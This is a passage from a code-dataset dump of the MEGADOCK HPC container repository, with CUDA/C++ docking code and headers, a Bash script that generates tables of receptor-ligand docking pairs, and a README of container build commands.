lig_vox_elec<<<nBlocks_ng3, nThreads>>>(ng1, na, grid_width, _Charge_gpu[myid2], atom_coord_rotated_gpu[myid2], grid_i_gpu[myid2]);\n } else {\n lig_vox_elec_serial<<<nBlocks_ng3, nThreads>>>(ng1, na, grid_width, _Charge_gpu[myid2], atom_coord_rotated_gpu[myid2], grid_i_gpu[myid2]);\n }\n\n /*\n float *tem_grid;\n const int ng2=ng1*ng1;\n tem_grid = new float[ng3];\n checkCudaErrors( cudaMemcpy(tem_grid, grid_i_gpu[myid2], sizeof(float)*ng3, cudaMemcpyDeviceToHost) );\n //for(int i=0;i<ng3;i++) if(tem_grid[i]!=0.0) printf(\" [%03d,%03d,%03d] : %6.3f\\n\",i/ng2,(i/ng1)%ng1,i%ng1,tem_grid[i]);\n //*/\n\n checkCudaErrors( cudaDeviceSynchronize() );\n if(myid2==0) gettimeofday(&et4,NULL);\n if(myid2==0) _cputime->t3_1_6_ligvoxgpu_kernel_elec += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //set Voxel grid[ng3] into center of FFT grid[nf3]\n if(myid2==0) gettimeofday(&et3,NULL);\n ligand_voxel_set<<<nBlocks_ng3, nThreads>>>(ng1,CUFFTin_gpu[myid2],grid_r_gpu[myid2],grid_i_gpu[myid2]);\n checkCudaErrors( cudaDeviceSynchronize() );\n if(myid2==0) gettimeofday(&et4,NULL);\n if(myid2==0) _cputime->t3_1_7_ligvoxgpu_kernel_set_array += (et4.tv_sec-et3.tv_sec + (float)((et4.tv_usec-et3.tv_usec)*1e-6));\n\n //*/\n}\n\n\n//============================================================================//\nvoid FFTProcessPDB::ligand_data_transfer_gpu(float *grid_coord)\n//============================================================================//\n{\n const int ng1 = _Num_fft / 2;\n const int na = _ligand->num_atoms();\n const int num_gpu = _parallel->num_gpu();\n const float rcore2 = 1.5; // ZDOCK parameter\n const float rsurf2 = 1.0; // ZDOCK parameter\n struct timeval et1, et2;\n\n float *radius_core2;\n float *radius_surf2;\n radius_core2 = new float[na];\n radius_surf2 = new float[na];\n\n for(int i = 0; i < na; i++) {\n radius_core2[i] = _ligand->_Radius[i] * _ligand->_Radius[i] * rcore2;\n radius_surf2[i] = _ligand->_Radius[i] * _ligand->_Radius[i] * rsurf2;\n }\n\n gettimeofday(&et1,NULL);\n for(int gpu_id = 0; gpu_id < num_gpu; gpu_id++) {\n cudaSetDevice(gpu_id);\n checkCudaErrors( cudaMemcpy(radius_core2_gpu[gpu_id], radius_core2, sizeof(float)*na, cudaMemcpyHostToDevice) );\n checkCudaErrors( cudaMemcpy(radius_surf2_gpu[gpu_id], radius_surf2, sizeof(float)*na, cudaMemcpyHostToDevice) );\n checkCudaErrors( cudaMemcpy(_Charge_gpu[gpu_id], _ligand->_Charge, sizeof(float)*na, cudaMemcpyHostToDevice) );\n checkCudaErrors( cudaMemcpy(grid_coord_gpu[gpu_id], grid_coord, sizeof(float)*ng1, cudaMemcpyHostToDevice) );\n checkCudaErrors( cudaMemcpy(atom_coord_orig_gpu[gpu_id], _ligand->_Coordinate, sizeof(float)*na*3, cudaMemcpyHostToDevice) );\n checkCudaErrors( cudaMemcpy(mole_center_coord_gpu[gpu_id], _ligand->_Center, sizeof(float)*3, cudaMemcpyHostToDevice) );\n }\n\n gettimeofday(&et2,NULL);\n _cputime->t6_data_transfer_lig += (et2.tv_sec-et1.tv_sec + (float)((et2.tv_usec-et1.tv_usec)*1e-6));\n\n delete[] radius_core2;\n delete[] radius_surf2;\n\n return;\n}\n\n#endif /* CUFFT */\n\n\n\n//============================================================================//\nvoid FFTProcessPDB::fft_memory_free()\n//============================================================================//\n{\n const size_t nproc2 = _parallel->nproc2();\n const int num_gpu = _parallel->num_gpu();\n const size_t nf3 = _Num_fft * _Num_fft * _Num_fft;\n\n for(int id = 0; id < nproc2; id++) {\n fftwf_destroy_plan(plan_fftw_forward[id]);\n fftwf_destroy_plan(plan_fftw_inverse[id]);\n }\n\n 
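// One forward and one inverse FFTW plan were created per worker thread in\n    // alloc_fft(), inside an omp critical section: FFTW's planner routines are\n    // not thread-safe, while fftwf_execute() on distinct plans is, so planning\n    // is serialized and execution runs concurrently. The plan arrays and the\n    // _FFTWin/_FFTWout buffers themselves are released in the destructor via\n    // delete[], fftwf_free() and fftwf_cleanup().\n    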
_cputime->record_free(sizeof(float)*nf3*2*(nproc2));\n\n#ifdef CUFFT\n\n //const int num_sort = _parameter->_Num_sort;\n const int nThreads = NUM_THREADS;\n const int nBlocks_nf3 = (nf3 + (nThreads-1)) / nThreads;\n\n for(int gpu_id = 0; gpu_id < num_gpu; gpu_id++) {\n cudaSetDevice(gpu_id);\n\n cufftDestroy(cufft_plan[gpu_id]);\n\n checkCudaErrors( cudaFree(CUFFTin_gpu[gpu_id]));\n checkCudaErrors( cudaFree(CUFFTout_gpu[gpu_id]));\n checkCudaErrors( cudaFree(_FFT_rec_r_gpu[gpu_id]));\n checkCudaErrors( cudaFree(_FFT_rec_i_gpu[gpu_id]));\n\n checkCudaErrors( cudaFree(grid_r_gpu[gpu_id]));\n checkCudaErrors( cudaFree(grid_i_gpu[gpu_id]));\n checkCudaErrors( cudaFree(grid_coord_gpu[gpu_id]));\n\n checkCudaErrors( cudaFree(radius_core2_gpu[gpu_id]));\n checkCudaErrors( cudaFree(radius_surf2_gpu[gpu_id]));\n checkCudaErrors( cudaFree(_Charge_gpu[gpu_id]));\n\n checkCudaErrors( cudaFree(xd_gpu[gpu_id]));\n checkCudaErrors( cudaFree(yd_gpu[gpu_id]));\n\n checkCudaErrors( cudaFree(zd_gpu[gpu_id]));\n\n checkCudaErrors( cudaFree(atom_coord_rotated_gpu[gpu_id]));\n checkCudaErrors( cudaFree(atom_coord_orig_gpu[gpu_id]));\n checkCudaErrors( cudaFree(mole_center_coord_gpu[gpu_id]));\n checkCudaErrors( cudaFree(ligand_rotation_angle_gpu[gpu_id]));\n\n checkCudaErrors( cudaFree(top_score_gpu[gpu_id]));\n checkCudaErrors( cudaFree(top_index_gpu[gpu_id]));\n\n delete [] top_score_host[gpu_id];\n delete [] top_index_host[gpu_id];\n\n }\n\n _cputime->record_free( sizeof(float)*nBlocks_nf3*num_gpu + sizeof(int)*nBlocks_nf3*num_gpu );\n\n#endif\n\n return;\n}\n" }, { "alpha_fraction": 0.5722261071205139, "alphanum_fraction": 0.5799022912979126, "avg_line_length": 33.530120849609375, "blob_id": "4a191ba50a436b155557d2f10b64faa26ad90c7d", "content_id": "e1df8bc97edba4e615b0e65d564117023ed371f3", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2866, "license_type": "permissive", "max_line_length": 256, "num_lines": 83, "path": "/megadock-scfa20/cuda_kernel.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// cuda_kernel.cu\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef CudaKernel_h\n#define CudaKernel_h 1\n\n__global__ void lig_vox_fill(int ng1\n ,int na\n ,float delta\n ,float *radius2\n ,float *xd\n ,float *yd\n ,float *zd\n ,float *grid_coord\n ,float *atom_coord_rotated\n ,float *grid_r\n \t\t\t\t\t\t ,float grid_width);\n\n\n\n__global__ void lig_rotation(int na, float *theta, float *atom_coord_orig, float *mole_center_coord, float *atom_coord_rotated);\n\n__global__ void ligvoxgpu_copy_htod(const int na, const float *const theta, const int ng1, const float *const atom_coord_orig, const float *const mole_center_coord, float *atom_coord_rotated, float *xd, float *yd, float *zd, const float *const grid_coord);\n\n__global__ void lig_calc_dis_atomgrid(int na, int ng1, float *xd, float *yd, float *zd, float *grid_coord, float *atom_coord_rotated);\n\n\n__global__ void lig_vox_init_grid(int ng3,float *grid_r,float *grid_i);\n\n\n__global__ void lig_vox_init_fft(int nf3,cufftComplex *lig_in);\n\n\n__global__ void lig_vox_init(int ng3,int nf3,float *grid_r,float 
*grid_i,cufftComplex *lig_in);\n\n__global__ void ligand_voxel_set(int ng1\n ,cufftComplex *lig_in\n ,float *grid_r\n ,float *grid_i);\n\n\n\n__global__ void lig_vox_surface_cut_CtoT(int ng1, float delta, float *grid_r);\n\n\n__global__ void lig_vox_elec(int ng1,int na,float grid_width,float *_Charge,float *atom_coord_rotated,float *grid_i);\n\n\n__global__ void lig_vox_elec_serial(int ng1,int na,float grid_width,float *_Charge,float *atom_coord_rotated,float *grid_i);\n\n\n\n__device__ void lig_vox_surface_cut_TtoO(int ng3, float delta, float *grid_r);\n\n\n__global__ void convolution_gpu(int nf3, float *rec_r, float *rec_i, cufftComplex *lig_out, cufftComplex *lig_in);\n\n\n__global__ void max_pos_single(int nf3, cufftComplex *out, float *score, int *pos);\n\n\n__global__ void max_pos_multi_set(int nf3, cufftComplex *out, float *temp_score, int *temp_index);\n\n\n//, std::vector<cufftComplex> *temp_result , thrust::vector<cufftComplex> *temp_result\n//thrust::device_ptr<cufftComplex> *temp_result cufftComplex *temp_result,thrust::device_ptr<cufftComplex> temp_result\n__global__ void max_pos_multi(int nf3, cufftComplex *out, float *score, int *pos,const int num_sort,const int offset);\n\n\n\n\n#endif\n" }, { "alpha_fraction": 0.6048791408538818, "alphanum_fraction": 0.6114910840988159, "avg_line_length": 27.115385055541992, "blob_id": "8718ea7d88f908bd7fcb2a84ed17f1b96207252b", "content_id": "f83effd29875a572a9fd83a1c12823a196601adf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4386, "license_type": "permissive", "max_line_length": 106, "num_lines": 156, "path": "/script/makeTable.sh", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "#!/bin/bash -e\nCWD=`pwd`\n\n# default params\nINTERACTIVE=${INTERACTIVE:-\"1\"}\nTABLE_ITEM_MAX=${TABLE_ITEM_MAX:-\"100000\"}\n\n# args\nif [ $# -lt 4 ] ; then\n echo \"Usage: $0 [RELATIVE_ROOT] [INPUT_DIR] [RECEPTOR_MATCH] [LIGAND_MATCH] [TABLE_TITLE]\"\n echo \"e.g.) $0 . data \\*_r.pdb \\*_l.pdb test\"\n echo \"e.g.) RUNTIME_RELATIVE_ROOT=/ $0 . data \\*_r.pdb \\*_l.pdb test\"\n echo \"e.g.) INERACTIVE=0 TABLE_ITEM_MAX=100 $0 . 
data \\*_r.pdb \\*_l.pdb test\"\n    exit\nfi\n\nRELATIVE_ROOT=$1\nBASE_INPUT_DIR=${2:-\"data\"}\nRECEPTOR_MATCH=$3\nLIGAND_MATCH=$4\nTABLE_TITLE=$5\nRUNTIME_RELATIVE_ROOT=${RUNTIME_RELATIVE_ROOT:-$RELATIVE_ROOT}\n\nBASE_TABLE_DIR=\"table\"\nBASE_OUTPUT_DIR=\"out\"\n\n# print params\necho -e \" \\n\\\n# PATH\nRELATIVE_ROOT = ${RELATIVE_ROOT} \\n\\\nRUNTIME_RELATIVE_ROOT = ${RUNTIME_RELATIVE_ROOT} \\n\\\n# INPUT \\n\\\nINPUT_DIR = ${BASE_INPUT_DIR} \\n\\\nRECEPTOR_MATCH = ${RECEPTOR_MATCH} \\n\\\nLIGAND_MATCH = ${LIGAND_MATCH} \\n\\\nTABLE_TITLE = ${TABLE_TITLE} \\n\\\n# OUTPUT \\n\\\nTABLE_DIR = ${BASE_TABLE_DIR} \\n\\\nOUTPUT_DIR = ${BASE_OUTPUT_DIR} \\n\\\n# OPTIONS \\n\\\nTABLE_ITEM_MAX = ${TABLE_ITEM_MAX} \\n\\\nINTERACTIVE = ${INTERACTIVE} \\n\\\n\"\n\nINPUT_DIR=\"${RELATIVE_ROOT}/${BASE_INPUT_DIR}\"\nTABLE_DIR=\"${RELATIVE_ROOT}/${BASE_TABLE_DIR}/${TABLE_TITLE}\"\nOUTPUT_DIR=\"${RELATIVE_ROOT}/${BASE_OUTPUT_DIR}/${TABLE_TITLE}\"\n\nreceptor_targets=`ls ${INPUT_DIR}/${RECEPTOR_MATCH}`\nligand_targets=`ls ${INPUT_DIR}/${LIGAND_MATCH}`\ncommon_option=\"-O\"\nTABLE_FILE=\"${TABLE_DIR}/${TABLE_TITLE}.table\"\n\nreceptor_num=`echo ${receptor_targets} | wc -w`\nligand_num=`echo ${ligand_targets} | wc -w`\nnum_pairs=$(( ${receptor_num} * ${ligand_num}))\n\nif [ ${num_pairs} -gt ${TABLE_ITEM_MAX} ] ; then\n    echo \"Note: # of total docking pairs exceeds the limit (TABLE_ITEM_MAX=${TABLE_ITEM_MAX}), so the pair list is trimmed.\"\n    echo\n    num_pairs=${TABLE_ITEM_MAX}\nfi\n\necho \"# of receptor match : ${receptor_num}\"\necho \"# of ligand match : ${ligand_num}\"\necho \"# of total docking pairs : ${num_pairs}\"\necho\n\necho \"A table file will be generated at:\"\necho \" ${TABLE_FILE}\"\necho\necho \"Please check the above parameters are correctly set.\"\necho\n\nif [ ${INTERACTIVE} -ne 0 ]; then\n    read -p \"> Start creating a docking table: ok? (y/N): \" yn\n    case \"$yn\" in [yY]*) ;; *) echo -e \"\\n abort.\" ; exit ;; esac\n    echo\nfi\n\nif [ ${INTERACTIVE} -ne 0 ]; then\n    echo \"> The following directories will be removed: \"\n    echo \" TABLE_DIR = ${TABLE_DIR}\"\n    echo \" OUTPUT_DIR = ${OUTPUT_DIR}\"\n    read -p \"> ok? 
(y/N): \" yn\n case \"$yn\" in [yY]*) ;; *) echo -e \"\\n abort.\" ; exit ;; esac\n echo\nfi\n\necho \"> Removing directories ...\"\nrm -rf ${TABLE_DIR}\nrm -rf ${OUTPUT_DIR}\n\n####################################\n# generate table\n####################################\n\necho \"> Start creating a docking table ...\"\n\n# initialize\nmkdir -p ${TABLE_DIR}\nmkdir -p ${OUTPUT_DIR}\n\n# set RUNTIME_RELATIVE_ROOT\nRUNTIME_INPUT_DIR=\"${RUNTIME_RELATIVE_ROOT}/${BASE_INPUT_DIR}\"\nRUNTIME_TABLE_DIR=\"${RUNTIME_RELATIVE_ROOT}/${BASE_TABLE_DIR}/${TABLE_TITLE}\"\nRUNTIME_OUTPUT_DIR=\"${RUNTIME_RELATIVE_ROOT}/${BASE_OUTPUT_DIR}/${TABLE_TITLE}\"\n# replace first \"//\" to \"/\" if exists\nRUNTIME_INPUT_DIR=${RUNTIME_INPUT_DIR/\"//\"/\"/\"}\nRUNTIME_TABLE_DIR=${RUNTIME_TABLE_DIR/\"//\"/\"/\"}\nRUNTIME_OUTPUT_DIR=${RUNTIME_OUTPUT_DIR/\"//\"/\"/\"}\n\n# write header\necho \"TITLE=${TABLE_TITLE}\" >> \"${TABLE_FILE}\"\necho \"PARAM=-R \\$1 -L \\$2 -o \\$3 ${common_option}\" >> \"${TABLE_FILE}\"\n\n# set counter\nprogress_bar='####################'\nprogress_ratio=${#progress_bar}\ncount_max=${num_pairs}\ncount=0\n\n# write body\nfor receptor in ${receptor_targets} ; do\n\n r_filename=$(basename $receptor)\n receptor_path=\"${RUNTIME_INPUT_DIR}/${r_filename}\"\n\n for ligand in ${ligand_targets} ; do\n\n count=$(( count + 1 ))\n if [ $count -gt ${num_pairs} ] ; then break; fi\n\n l_filename=$(basename $ligand)\n ligand_path=\"${RUNTIME_INPUT_DIR}/${l_filename}\"\n\n # set output filepath\n output_path=\"${RUNTIME_OUTPUT_DIR}/${r_filename%.*}_${l_filename%.*}.out\"\n\n # write a line\n echo -e \"${receptor_path}\\t${ligand_path}\\t${output_path}\" >> \"${TABLE_FILE}\"\n\n # show progress\n progress=$(( count * progress_ratio / count_max ))\n echo -ne \"\\r[\\t$count / $count_max ] ${progress_bar:0:$progress}\"\n\n done\n\n if [ $count -gt $num_pairs ] ; then break; fi\n\ndone\n\necho\necho\necho \"Table file is generated at:\"\necho \" $TABLE_FILE\"\n" }, { "alpha_fraction": 0.563312828540802, "alphanum_fraction": 0.5701574087142944, "avg_line_length": 25.563636779785156, "blob_id": "b86b516fc6ac449abc83295c3dae64874dc296fd", "content_id": "e4c55f0f4493e3e943e5b3817501ce196ac0d867", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2922, "license_type": "permissive", "max_line_length": 135, "num_lines": 110, "path": "/megadock-scfa20/fft_process.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : FFTProcess\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef FFTProcess_h\n#define FFTProcess_h 1\n\n#include <algorithm>\n#include <functional>\n#include <cstring>\n#include <unistd.h>\n\n\n#include \"parallel.h\"\n#include \"parameter_table.h\"\n#include \"parameter_pdb.h\"\n#include \"protein.h\"\n#include \"ligand.h\"\n#include \"receptor.h\"\n\n#ifdef CUFFT\n#include \"helper_cuda.h\"\n#include \"cufft.h\"\n//#include <thrust/device_vector.h>\n//#include <thrust/device_ptr.h>\n\n#endif\n\n#include \"fftw3.h\"\n\nusing namespace std;\n\ntypedef struct {\n float score;\n int index[4];\n} SortScore;\n\ntemplate<class P> class FFTProcess\n{\nprivate:\n 
FFTProcess(FFTProcess &c) {}\n const FFTProcess & operator=(const FFTProcess &c);\n\nprotected:\n Parallel *_parallel;\n P *_parameter;\n Ligand<P> *_ligand;\n Receptor<P> *_receptor;\n vector<SortScore> _Top;\n vector< vector<SortScore> > _Select;\n int _Num_fft;\n float *_FFT_rec_r;\n float *_FFT_rec_i;\n virtual void alloc_fft() = 0;\npublic:\n FFTProcess(Parallel *pparallel,P *pparameter, Receptor<P> *preceptor, Ligand<P> *pligand)\n : _parallel(pparallel),_parameter(pparameter),_receptor(preceptor),_ligand(pligand) {\n\n#ifdef DEBUG\n cout << \"Constructing FFTProcess.\\n\";\n#endif\n //cout << \"FFTP const \"<< _parameter->_Num_sort <<endl; cout.flush();\n }\n virtual ~FFTProcess() {\n#ifdef DEBUG\n cout << \"Destructing FFTProcess.\\n\";\n#endif\n delete [] _FFT_rec_r;\n delete [] _FFT_rec_i;\n\n vector< vector<SortScore> > tmp1;\n vector<SortScore> tmp2;\n _Select.swap(tmp1);\n _Top.swap(tmp2);\n }\n virtual void alloc_array(const int &num_fft) = 0;\n virtual void receptor_fft(float *grid_r,float *grid_i) = 0;\n#ifdef CUFFT\n virtual void cuda_fft(float *grid_r,float *grid_i,float *grid_coord,float *atom_coord_rotated,float *theta, size_t myid2) = 0;\n virtual void ligand_voxelization_on_gpu(float *theta, size_t myid2) = 0;\n virtual void ligand_data_transfer_gpu(float *grid_coord) = 0;\n#endif\n virtual void fft_memory_free() = 0;\n virtual void top_score_clean();\n virtual int num_fft() {\n return _Num_fft;\n }\n virtual void num_fft(const int &i) {\n _Num_fft = i;\n }\n virtual float top_score(const int &j) {\n return _Top[j].score;\n }\n virtual int top_index(const int &j,int k) {\n return _Top[j].index[k];\n }\n virtual void sort_index(float *fwork,int *iwork);\n};\n\n#endif\n" }, { "alpha_fraction": 0.6198296546936035, "alphanum_fraction": 0.6234793066978455, "avg_line_length": 27.842105865478516, "blob_id": "2053a85cbd84bb9883f0ffe10d777a78ee61ec9c", "content_id": "cf20d13095a96ebaaf19d87157a530030d701d1f", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1644, "license_type": "permissive", "max_line_length": 89, "num_lines": 57, "path": "/megadock-scfa20/docking_table.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : DockingTable\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef DockingTable_h\n#define DockingTable_h 1\n\n#include \"docking.h\"\n#include \"exec_logger.h\"\n#include \"parameter_table.h\"\n#include \"fft_process_table.h\"\n\nusing namespace std;\n\nclass DockingTable : public Docking<ParameterTable, FFTProcessTable>\n{\nprivate:\n ExecLogger *_exec_logger;\n float *_Mol_coord;\nprotected:\n virtual void maxsize_voxel();\n virtual void alloc_array(const int &maxatom, const int &nag, const size_t &ng3);\n virtual void create_voxel(Protein<ParameterTable> *rprotein);\n virtual void ligand_rotationz(float *theta);\npublic:\n DockingTable(ExecLogger *pexec_logger,Parallel *pparallel,ParameterTable *pparameter,\n Receptor<ParameterTable> *rreceptor,Ligand<ParameterTable> *rligand)\n : _exec_logger(pexec_logger),Docking(pparallel,pparameter,rreceptor,rligand) {\n#ifdef DEBUG\n cout << \"Constructing 
DockingTable.\\n\";\n#endif\n }\n virtual ~DockingTable() {\n#ifdef DEBUG\n cout << \"Destructing DockingTable.\\n\";\n#endif\n }\n virtual void initialize();\n virtual void rec_init();\n virtual void dockz();\n virtual void dock_memory_free();\n virtual void output();\n virtual void output_detail(); // for analysis\n virtual void output_calc_time_log(); // for analysis\n};\n\n#endif\n" }, { "alpha_fraction": 0.5757214426994324, "alphanum_fraction": 0.580491304397583, "avg_line_length": 27.33108139038086, "blob_id": "e3c593e3278395cfb8860dc7cb54f94592d80b4b", "content_id": "b3d6aa6a4fc19177c068d8598e6bc82ee9ab561e", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4193, "license_type": "permissive", "max_line_length": 147, "num_lines": 148, "path": "/megadock-scfa20/fft_process_pdb.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : FFTProcessPDB\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef FFTProcessPDB_h\n#define FFTProcessPDB_h 1\n\n#include \"cpu_time.h\"\n#include \"fft_process.h\"\n\nclass FFTProcessPDB : public FFTProcess<ParameterPDB>\n{\nprivate:\n#ifdef CUFFT\n //host side\n cufftHandle *cufft_plan;\n cufftResult *cufft_result;\n cufftComplex *CUFFTin_host;\n cufftComplex *CUFFTout_host;\n float **top_score_host;\n int **top_index_host;\n\n //device side\n cufftComplex **CUFFTin_gpu;\n cufftComplex **CUFFTout_gpu;\n float **_FFT_rec_r_gpu;\n float **_FFT_rec_i_gpu;\n float **top_score_gpu;\n int **top_index_gpu;\n\n float **radius_core2_gpu;\n float **radius_surf2_gpu;\n float **_Charge_gpu;\n float **xd_gpu;\n float **yd_gpu;\n float **zd_gpu;\n float **grid_coord_gpu;\n float **atom_coord_rotated_gpu;\n float **grid_r_gpu;\n float **grid_i_gpu;\n float **atom_coord_orig_gpu;\n float **mole_center_coord_gpu;\n float **ligand_rotation_angle_gpu;\n\n\n#endif /* CUFFT */\n\n fftwf_plan *plan_fftw_forward;\n fftwf_plan *plan_fftw_inverse;\n\n fftwf_complex *_FFTWin; \n fftwf_complex *_FFTWout;\n\n CPUTime *_cputime;\n vector< vector<SortScore> > _Select;\n int *_Current_rot_angle_num;\nprotected:\n virtual void alloc_fft();\npublic:\n virtual void fft3d(const float &theta, size_t myid2);\n FFTProcessPDB(CPUTime *pcputime,Parallel *pparallel,ParameterPDB *pparameter, Receptor<ParameterPDB> *preceptor, Ligand<ParameterPDB> *pligand)\n : _cputime(pcputime),FFTProcess(pparallel, pparameter, preceptor, pligand) {\n\n#ifdef DEBUG\n cout << \"Constructing FFTProcessPDB.\\n\";\n#endif\n //cout << \"FFTP const \"<< _parameter->_Num_sort <<endl; cout.flush();\n }\n virtual ~FFTProcessPDB() {\n#ifdef DEBUG\n cout << \"Destructing FFTProcessPDB.\\n\";\n#endif\n delete [] _Current_rot_angle_num;\n\n#ifdef CUFFT\n //host side\n delete [] cufft_plan;\n delete [] cufft_result;\n delete [] CUFFTin_host;\n delete [] CUFFTout_host;\n delete [] top_score_host;\n delete [] top_index_host;\n\n //device side\n delete [] CUFFTin_gpu;\n delete [] CUFFTout_gpu;\n delete [] _FFT_rec_r_gpu;\n delete [] _FFT_rec_i_gpu;\n delete [] top_score_gpu;\n delete [] top_index_gpu;\n\n delete [] radius_core2_gpu;\n delete [] radius_surf2_gpu;\n delete [] _Charge_gpu;\n 
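// These delete[] calls release only the host-side arrays that held the\n        // per-GPU device pointers; the device buffers they pointed to are freed\n        // separately with cudaFree() in fft_memory_free().\n        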
delete [] xd_gpu;\n delete [] yd_gpu;\n delete [] zd_gpu;\n delete [] grid_coord_gpu;\n delete [] atom_coord_rotated_gpu;\n delete [] grid_r_gpu;\n delete [] grid_i_gpu;\n\n delete [] atom_coord_orig_gpu;\n delete [] mole_center_coord_gpu;\n delete [] ligand_rotation_angle_gpu;\n\n\n#endif\n\n delete [] plan_fftw_forward;\n delete [] plan_fftw_inverse;\n\n fftwf_free(_FFTWin);\n fftwf_free(_FFTWout);\n fftwf_cleanup();\n\n vector< vector<SortScore> > tmp1;\n vector<SortScore> tmp2;\n _Select.swap(tmp1);\n _Top.swap(tmp2);\n }\n virtual void alloc_array(const int &num_fft);\n virtual void receptor_fft(float *grid_r,float *grid_i);\n#ifdef CUFFT\n virtual void cuda_fft(float *grid_r,float *grid_i,float *grid_coord,float *atom_coord_rotated,float *theta, size_t myid2);\n virtual void ligand_voxelization_on_gpu(float *theta, size_t myid2);\n virtual void ligand_data_transfer_gpu(float *grid_coord);\n#endif\n virtual void ligand_preparation(float *grid_r,float *grid_i, size_t myid2);\n virtual void convolution(size_t myid2);\n virtual void score_sort(size_t myid2);\n virtual void fft_memory_free();\n virtual void rotation_index(int i,const int &j) {\n _Current_rot_angle_num[i] = j;\n }\n};\n\n#endif\n" }, { "alpha_fraction": 0.5421428680419922, "alphanum_fraction": 0.5464285612106323, "avg_line_length": 24, "blob_id": "dffc6437292445d6d8e315b06eb7cce9a2e5bf11", "content_id": "58bfb4d0b3a719f8cc1a9598be05148aed78f2f6", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1400, "license_type": "permissive", "max_line_length": 89, "num_lines": 56, "path": "/megadock-scfa20/parameter_table.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : ParameterTable\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef ParameterTable_h\n#define ParameterTable_h 1\n\n#include \"parameter.h\"\n\nusing namespace std;\n\nclass ParameterTable : public Parameter\n{\nprivate:\n friend class ControlTable;\n friend class DockingTable;\n friend class FFTProcessTable;\n#ifdef MPI_DP\n string _RecPDB_file;\n string _LigPDB_file;\n int _IO_flag[3];\n\nprotected:\n virtual void pdb_step();\n#else\n string _Table_file;\n#endif\n\npublic:\n ParameterTable(Parallel *pparallel) : Parameter(pparallel) {\n#ifdef DEBUG\n cout << \"Constructing ParameterTable.\\n\";\n#endif\n }\n virtual ~ParameterTable() {\n#ifdef DEBUG\n cout << \"Destructing ParameterTable.\\n\";\n#endif\n }\n virtual void process_args(int argc,char *argv[]);\n using Parameter::initialize;\n virtual void initialize(ParameterTable *pparameter);\n virtual void output_file_name(const string rec_file, const string lig_file);\n};\n\n#endif\n" }, { "alpha_fraction": 0.6421663165092468, "alphanum_fraction": 0.7234042286872864, "avg_line_length": 27.77777862548828, "blob_id": "bfb118af47a54643402247f65c978fd6b44c2b6c", "content_id": "095973a06934bb6aae81571610be40bd256ae4cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 517, "license_type": "permissive", "max_line_length": 129, "num_lines": 18, "path": "/sample/README.md", "repo_name": "akiyamalab/megadock_hpccm", 
"src_encoding": "UTF-8", "text": "```sh\n# Sample Recipes\n\n# For general docker environment\nhpccm --recipe megadock_hpccm.py --format docker > Dockerfile\n\n\n# For TSUBAME3.0\n# target modules: cuda/8.0.61 openmpi/2.1.2-opa10.9\n\nhpccm --recipe megadock_hpccm.py --format singularity --userarg ompi=2.1.2 fftw=3.3.8 opa=True > singularity_ompi-2-1-2_opa.def\n\n\n# For ABCI\n# target modules: cuda/10.0/10.0.130 openmpi/2.1.6\n\nhpccm --recipe megadock_hpccm.py --format singularity --userarg ompi=2.1.6 fftw=3.3.8 ofed=True > singularity_ompi-2-1-6_ofed.def\n```" }, { "alpha_fraction": 0.5157516002655029, "alphanum_fraction": 0.521152138710022, "avg_line_length": 21.67346954345703, "blob_id": "4df809dfb7cdbb1f14f8ead60eaf7a042246162c", "content_id": "516753d1283cbe572e98c2048f0bb0e6bc53ea17", "detected_licenses": [ "Apache-2.0", "LicenseRef-scancode-proprietary-license" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1111, "license_type": "permissive", "max_line_length": 80, "num_lines": 49, "path": "/megadock-scfa20/parameter_pdb.h", "repo_name": "akiyamalab/megadock_hpccm", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2019 Tokyo Institute of Technology\n */\n\n//============================================================================//\n//\n// Software Name : MEGADOCK\n//\n// Class Name : ParameterPDB\n//\n// Contact address : Tokyo Institute of Technology, AKIYAMA Lab.\n//\n//============================================================================//\n\n#ifndef ParameterPDB_h\n#define ParameterPDB_h 1\n\n#include 